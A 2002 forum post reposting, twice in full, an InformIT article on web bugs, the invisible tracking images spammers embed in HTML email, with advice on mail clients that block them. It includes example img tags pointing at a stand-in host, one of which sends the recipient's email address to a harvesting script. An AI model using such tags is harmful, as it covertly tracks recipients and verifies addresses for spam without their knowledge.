denolth2
03-11-02, 12:08 PM
Some information on spammers and email spying:
taken from Informit.com
denolth2 :O
Web Bugs: How Spammers and Web Designers Are Using Invisible Images To Keep Track Of You
by Kyle Cassidy, Joseph Dries, the Authors of "The Concise Guide to Enterprise Internetworking and Security."
MAR 08, 2002
Spam Spam Spam Spam Spam Spam Spam Spam and Spam
Last week I got a piece of spam. Spam, of course, is unsolicited, bulk, commercial email—not
to be confused with the Hormel meat product. It's not unusual that I got a piece of spam
last week, actually; having had the same email address for ten years now, I get a lot of it.
Mostly advertising ***** enlargements, herbal Viagra, and Hot Young Teens doing all sorts of
things.
I, like many of you, feel it my personal responsibility to respond to each and every piece
of spam that I get, usually with carbon copies upstream to those hosting spammers' Web sites
and to sad sysadmins who most likely already know they left their SMTP ports unguarded. I do
this because I am certain that spam is the Internet's ugliest side. Because spam is not yet
properly defined by law in the U.S. or most European nations, there are no enforceable
regulations preventing its continuing growth. In the U.S., for example, there are five
pieces of legislation before the House and one before the Senate that deal with spam. Not
one of them prohibits the sending of spam; only the normal dirty tricks, such as falsifying
headers, misleading subject line, fraudulent content, and so on.
Trying to dig the six legitimate pieces of email out of 100 Multi Level Marketing (MLM)
scams over a 14.4k modem on a shaky phone line in Cairo will make the most even-tempered of
us furious at those trying to sell home-based businesses by sending copies of their
advertisement to half a million Internet users in the hopes that one or two people will buy
it.
Clever Payload
This time, amid the potions guaranteed to enlarge my bust and
ten-day-no-risk-no-money-down-work-at-home-stuffing-envelopes plans that would significantly
increase my wealth, one piece of spam stood out. It appeared in my Outlook Express window as
a completely blank message. Which in itself isn't necessarily shocking because I have a
feeling that most people sending out spam are very new to the Internet, but it still puzzled
me. So I checked to see if there was any HTML in the message—for some reason, spammers seem
incapable of sending messages in ASCII. And sure enough, there was. There was a single line
of ingenious HTML that looked like this:
<img src="http://somewhere.foo.bar/images/zero.jpg">
This turned out to be a one-kilobyte .jpeg file that measured a single white pixel across.
Nearly invisible. It really was, as you may have guessed, an insidious and surreptitious
"return receipt requested." When the email is opened, the .jpeg file is automatically
downloaded by your HTML viewing email client. What does this do, though? It creates a log
entry in a Web server (in this case located in Hong Kong) that says that you opened the
email, when you opened the email, and the IP address you opened the email from.
Call an Exterminator! It's a Web Bug!
Those well-versed in Internet entomology (or even Internet etymology) will recognize this as
a Web Bug (also known as a "1x1 gif" or a "clear .gif") that is used for tracking the
movements of people viewing HTML, either in an email message or on the Web in general.
What Are the Implications?
Well, the most disconcerting is that that your location, more or less, is harvested by
simply opening the email. Most Web servers can be set to save log files that will include
your IP address, the file you accessed, and the time you accessed it. Although Web Bugs
might not be the most accurate method of tracking someone down, it's enough to let them know
that you're reading your email at a Kinko's terminal in Raleigh, North Carolina.
There are more insidious ways that HTML can be manipulated to gather addresses. HTML tags
can be used to request remote documents. Tags that generally automatically retrieve remote
images or documents include img, frame, link, and the background= attribute used with body
and table. When encoding the URL such as the following, the spam sender can not only gather
passive intelligence such as your email reading habits, IP address, operating system, and
browser, but actually verifies your email address:
<img src="http://somewhere.foo.bar/harvest.pl?emailid%3Daddress%40example.com">Although this
method is probably impractical for verifying tens of thousands of individual addresses, it
is useful for several things:
It identifies percentages of people using HTML-compliant mail readers.
It identifies a general level of "completeness" of a bulk emailer's mailing list. For
example, if 2,000,000 emails are sent out, and the .jpeg file is downloaded 1,000,000 times,
the spamvertiser can assume that about half the addresses on the list are bad.
It can track down a single individual. Such an email sent to only one person and opened by
that person results in a log entry revealing the IP address that the recipient was reading
mail from. Maybe not the best way to locate deadbeat dads, but probably good enough to tell
if Osama Bin Laden is reading his email from a coffee shop in Milan.
It can identify who will open what type of message. A web Bug can be used nefariously inside
a corporation to see who might read email that the company doesn't like. For example, a
bogus message with the topic "On-line games you can play during office hours!" might contain
a Web Bug that returns a list of all the employees who had opened it.
It can track who reads particular Usenet NEWS messages. Because programs such as Outlook and
Netscape can post and read HTML mail messages to Usenet NEWS groups, it's possible to post a
Web Bug as part of a NEWS message, and track who and how many people read that message. A
typical example of this is law enforcement compiling a database of people who read a post
about an illegal or suspicious activity; a message entitled "bomb recipes" for example.
It can track how email is forwarded. People who are interested in how viruses get from one
place to another, or who wonder how virus hoaxes or jokes get forwarded from person to
person can use a Web Bug to trace the path of an email message from user to user.
Innocuous info that is passively gathered can easily be used by black hats (criminal
hackers, or crackers) to check and see whether you've applied all the Microsoft security
patches.
A verifiable working email address can be sold to others looking to join the spam wagon.
Protecting Yourself from HTML Snooping
From a security standpoint, anything that comes from somewhere else and runs applications on
your computer, no matter how seemingly innocuous, is a threat, and should be avoided if
possible. However, in many ways, the horse is already out of the proverbial barn here. HTML
is, for the most part, probably here to stay as it is built in as a default "feature" to
more and more email clients. It's also difficult to explain to novice users why their
flowered stationary and HUGE BLUE FONTS WITH UNDERLINES AND EMPHASIS are not as good as
plain old boring ASCII text where italics are indicated by _manually added pre- and
postpended underscores_.
The best way to protect yourself from someone using this type of snoop is to use a non-HTML
compliant browser. Unix-based mail readers such as MUTT, ELM, and PINE not only don't fall
for this trick, but they're immune to the Microsoft-specific viruses that currently plague
the Earth.
Mail Readers that Don't Display Exterior Graphics
Luckily, there are several email programs that interpret the innocuous parts of HTML (bold
and italics, for example) without displaying Web Bugs and other exterior graphics:
Eudora 5.1 for Windows and Mac OS: http://www.eudora.com/.
Evolution for UNIX/Linux: http://www.ximian.com/.
Mail.app for MacOS X: http://www.apple.com/macosx/.
Entourage, part of Office 2001 for MacOS 9 or Office X for MacOS X:
http://www.microsoft.com/macoffice/.
Generally, they have a toggle such as "display HTML that is included in message only," or
"Disable the download of HTML images" so that the HTML formatting is kept, but linked bits
are not. Most email clients today also strip Javascript from included HTML. Unfortunately,
the user can often be easily convinced to open an attachment that is actually a program that
installs a backdoor trojan or worm. Those types of attachments are best dealt with on the
mail server.
Web-based Email Clients that Are Safe
Many people use the most popular free mail services such as Hotmail, Yahoo, and so on. Those
services currently don't offer the capability to turn off HTML emails. For those people who
want to make their email accessible via the Web, there are several freely available clients
that work with the Internet standards POP3 or IMAP. This means you can easily replace the
troublesome Outlook Web Access with something safer and easily modifiable.
SquirrelMail (http://www.squirrelmail.org/) is a nice, lightweight, Web-based email client.
The recently released 1.2.x series allows the administrator to enable or disable HTML email
viewing by default, and, if enabled, includes an HTML view that strips out the JavaScript,
meta tags, and any images/documents that were not included in the email itself. SquirrelMail
is extensible through the use of plug-ins that change or enhance the behavior and features
of SquirrelMail. This allows the administrator decide how much is necessary.
IMP (http://horde.org/imp/), the Internet Mail Program, is another Web-based, fully featured
email client that doesn't by default display HTML emails. IMP is part of the Horde Project,
which is a platform for Web-based applications for productivity, messaging, and project
management.
If you own Microsoft Office, you can use Outlook (98, 2000, or XP). However, be absolutely
certain to apply all the software and security updates. In and of itself, it does not make
you immune to Web Bugs, but it does prevent many other associated problems, such as
JavaScript and other scripting attacks. You can make it display ASCII only, but not in the
simple "display only ASCII" manner you would expect from a piece of software that requires
135 megabytes of free disk space to install. Instead, it requires that you first turn off
the preview pane (in View, Layout, uncheck Show preview pane). Then, every time you want to
read a message, you need to right-click on the message, select Properties, Details, and
Message source.
Microsoft shows the way:
http://support.microsoft.com/directory/article.asp?ID=KB;EN-US;q165531.
If you only have Outlook Express installed on your computer, you are better off NOT using it
and finding another email client such as Eudora (or even a different operating system whose
focus is more on keeping your data safe rather than turning on features that make you a
target).:rolleyes:
taken from Informit.com
denolth2 :O
Web Bugs: How Spammers and Web Designers Are Using Invisible Images To Keep Track Of You
by Kyle Cassidy, Joseph Dries, the Authors of "The Concise Guide to Enterprise Internetworking and Security."
MAR 08, 2002
Spam Spam Spam Spam Spam Spam Spam Spam and Spam
Last week I got a piece of spam. Spam, of course, is unsolicited, bulk, commercial email—not
to be confused with the Hormel meat product. It's not unusual that I got a piece of spam
last week, actually; having had the same email address for ten years now, I get a lot of it.
Mostly advertising ***** enlargements, herbal Viagra, and Hot Young Teens doing all sorts of
things.
I, like many of you, feel it my personal responsibility to respond to each and every piece
of spam that I get, usually with carbon copies upstream to those hosting spammers' Web sites
and to sad sysadmins who most likely already know they left their SMTP ports unguarded. I do
this because I am certain that spam is the Internet's ugliest side. Because spam is not yet
properly defined by law in the U.S. or most European nations, there are no enforceable
regulations preventing its continuing growth. In the U.S., for example, there are five
pieces of legislation before the House and one before the Senate that deal with spam. Not
one of them prohibits the sending of spam; only the normal dirty tricks, such as falsifying
headers, misleading subject line, fraudulent content, and so on.
Trying to dig the six legitimate pieces of email out of 100 Multi Level Marketing (MLM)
scams over a 14.4k modem on a shaky phone line in Cairo will make the most even-tempered of
us furious at those trying to sell home-based businesses by sending copies of their
advertisement to half a million Internet users in the hopes that one or two people will buy
it.
Clever Payload
This time, amid the potions guaranteed to enlarge my bust and
ten-day-no-risk-no-money-down-work-at-home-stuffing-envelopes plans that would significantly
increase my wealth, one piece of spam stood out. It appeared in my Outlook Express window as
a completely blank message. Which in itself isn't necessarily shocking because I have a
feeling that most people sending out spam are very new to the Internet, but it still puzzled
me. So I checked to see if there was any HTML in the message—for some reason, spammers seem
incapable of sending messages in ASCII. And sure enough, there was. There was a single line
of ingenious HTML that looked like this:
<img src="http://somewhere.foo.bar/images/zero.jpg">
This turned out to be a one-kilobyte .jpeg file that measured a single white pixel across.
Nearly invisible. It really was, as you may have guessed, an insidious and surreptitious
"return receipt requested." When the email is opened, the .jpeg file is automatically
downloaded by your HTML viewing email client. What does this do, though? It creates a log
entry in a Web server (in this case located in Hong Kong) that says that you opened the
email, when you opened the email, and the IP address you opened the email from.
Call an Exterminator! It's a Web Bug!
Those well-versed in Internet entomology (or even Internet etymology) will recognize this as
a Web Bug (also known as a "1x1 gif" or a "clear .gif") that is used for tracking the
movements of people viewing HTML, either in an email message or on the Web in general.
What Are the Implications?
Well, the most disconcerting is that that your location, more or less, is harvested by
simply opening the email. Most Web servers can be set to save log files that will include
your IP address, the file you accessed, and the time you accessed it. Although Web Bugs
might not be the most accurate method of tracking someone down, it's enough to let them know
that you're reading your email at a Kinko's terminal in Raleigh, North Carolina.
There are more insidious ways that HTML can be manipulated to gather addresses. HTML tags
can be used to request remote documents. Tags that generally automatically retrieve remote
images or documents include img, frame, link, and the background= attribute used with body
and table. When encoding the URL such as the following, the spam sender can not only gather
passive intelligence such as your email reading habits, IP address, operating system, and
browser, but actually verifies your email address:
<img src="http://somewhere.foo.bar/harvest.pl?emailid%3Daddress%40example.com">Although this
method is probably impractical for verifying tens of thousands of individual addresses, it
is useful for several things:
It identifies percentages of people using HTML-compliant mail readers.
It identifies a general level of "completeness" of a bulk emailer's mailing list. For
example, if 2,000,000 emails are sent out, and the .jpeg file is downloaded 1,000,000 times,
the spamvertiser can assume that about half the addresses on the list are bad.
It can track down a single individual. Such an email sent to only one person and opened by
that person results in a log entry revealing the IP address that the recipient was reading
mail from. Maybe not the best way to locate deadbeat dads, but probably good enough to tell
if Osama Bin Laden is reading his email from a coffee shop in Milan.
It can identify who will open what type of message. A web Bug can be used nefariously inside
a corporation to see who might read email that the company doesn't like. For example, a
bogus message with the topic "On-line games you can play during office hours!" might contain
a Web Bug that returns a list of all the employees who had opened it.
It can track who reads particular Usenet NEWS messages. Because programs such as Outlook and
Netscape can post and read HTML mail messages to Usenet NEWS groups, it's possible to post a
Web Bug as part of a NEWS message, and track who and how many people read that message. A
typical example of this is law enforcement compiling a database of people who read a post
about an illegal or suspicious activity; a message entitled "bomb recipes" for example.
It can track how email is forwarded. People who are interested in how viruses get from one
place to another, or who wonder how virus hoaxes or jokes get forwarded from person to
person can use a Web Bug to trace the path of an email message from user to user.
Innocuous info that is passively gathered can easily be used by black hats (criminal
hackers, or crackers) to check and see whether you've applied all the Microsoft security
patches.
A verifiable working email address can be sold to others looking to join the spam wagon.
Protecting Yourself from HTML Snooping
From a security standpoint, anything that comes from somewhere else and runs applications on
your computer, no matter how seemingly innocuous, is a threat, and should be avoided if
possible. However, in many ways, the horse is already out of the proverbial barn here. HTML
is, for the most part, probably here to stay as it is built in as a default "feature" to
more and more email clients. It's also difficult to explain to novice users why their
flowered stationary and HUGE BLUE FONTS WITH UNDERLINES AND EMPHASIS are not as good as
plain old boring ASCII text where italics are indicated by _manually added pre- and
postpended underscores_.
The best way to protect yourself from someone using this type of snoop is to use a non-HTML
compliant browser. Unix-based mail readers such as MUTT, ELM, and PINE not only don't fall
for this trick, but they're immune to the Microsoft-specific viruses that currently plague
the Earth.
Mail Readers that Don't Display Exterior Graphics
Luckily, there are several email programs that interpret the innocuous parts of HTML (bold
and italics, for example) without displaying Web Bugs and other exterior graphics:
Eudora 5.1 for Windows and Mac OS: http://www.eudora.com/.
Evolution for UNIX/Linux: http://www.ximian.com/.
Mail.app for MacOS X: http://www.apple.com/macosx/.
Entourage, part of Office 2001 for MacOS 9 or Office X for MacOS X:
http://www.microsoft.com/macoffice/.
Generally, they have a toggle such as "display HTML that is included in message only," or
"Disable the download of HTML images" so that the HTML formatting is kept, but linked bits
are not. Most email clients today also strip Javascript from included HTML. Unfortunately,
the user can often be easily convinced to open an attachment that is actually a program that
installs a backdoor trojan or worm. Those types of attachments are best dealt with on the
mail server.
Web-based Email Clients that Are Safe
Many people use the most popular free mail services such as Hotmail, Yahoo, and so on. Those
services currently don't offer the capability to turn off HTML emails. For those people who
want to make their email accessible via the Web, there are several freely available clients
that work with the Internet standards POP3 or IMAP. This means you can easily replace the
troublesome Outlook Web Access with something safer and easily modifiable.
SquirrelMail (http://www.squirrelmail.org/) is a nice, lightweight, Web-based email client.
The recently released 1.2.x series allows the administrator to enable or disable HTML email
viewing by default, and, if enabled, includes an HTML view that strips out the JavaScript,
meta tags, and any images/documents that were not included in the email itself. SquirrelMail
is extensible through the use of plug-ins that change or enhance the behavior and features
of SquirrelMail. This allows the administrator decide how much is necessary.
IMP (http://horde.org/imp/), the Internet Mail Program, is another Web-based, fully featured
email client that doesn't by default display HTML emails. IMP is part of the Horde Project,
which is a platform for Web-based applications for productivity, messaging, and project
management.
If you own Microsoft Office, you can use Outlook (98, 2000, or XP). However, be absolutely
certain to apply all the software and security updates. In and of itself, it does not make
you immune to Web Bugs, but it does prevent many other associated problems, such as
JavaScript and other scripting attacks. You can make it display ASCII only, but not in the
simple "display only ASCII" manner you would expect from a piece of software that requires
135 megabytes of free disk space to install. Instead, it requires that you first turn off
the preview pane (in View, Layout, uncheck Show preview pane). Then, every time you want to
read a message, you need to right-click on the message, select Properties, Details, and
Message source.
Microsoft shows the way:
http://support.microsoft.com/directory/article.asp?ID=KB;EN-US;q165531.
If you only have Outlook Express installed on your computer, you are better off NOT using it
and finding another email client such as Eudora (or even a different operating system whose
focus is more on keeping your data safe rather than turning on features that make you a
target).:rolleyes: